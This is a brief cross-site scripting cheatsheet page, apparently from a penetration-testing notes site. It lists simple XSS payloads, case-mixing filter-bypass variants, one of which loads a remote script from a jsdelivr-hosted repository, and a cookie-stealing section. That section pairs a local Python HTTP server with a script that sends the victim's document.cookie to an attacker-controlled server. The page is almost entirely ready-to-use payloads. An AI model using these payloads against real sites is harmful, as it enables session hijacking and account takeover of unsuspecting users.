🐱cross site scripting

Cross Site Scripting Cheatsheet

Simple Payloads

<script>alert(1)</script>

<script>window.location.href="https://yahoo.com"</script>

<script>alert(window.location.hostname)</script>

<script>document.getElementById("<id value>").innerHTML="this is cool"</script>

<script>document.querySelector('id value').textContent = 'Xss is awesome'</script>

Filter Bypass

<SCRIPT SRC=https://cdn.jsdelivr.net/gh/Moksh45/host-xss.rocks/index.js></SCRIPT>

<ScRiPt>alert(1)</ScRIpT>

<ScRiPt>alert(String.fromCharCode(104,105))</ScRIpT>

Online Cheatsheet

OWASP

python3 -m http.server 1234

<script type="text/javascript">document.location="http://<server-ip>:<port>/?cookies="+document.cookie;</script>

RequestBin

References

GitHub Payloads

Previousgraphql injection NextCommand Injection

Last updated 9 months ago

Cross Site Scripting Cheatsheet

Simple Payloads

Filter Bypass

Online Cheatsheet

Cookie Stealing

References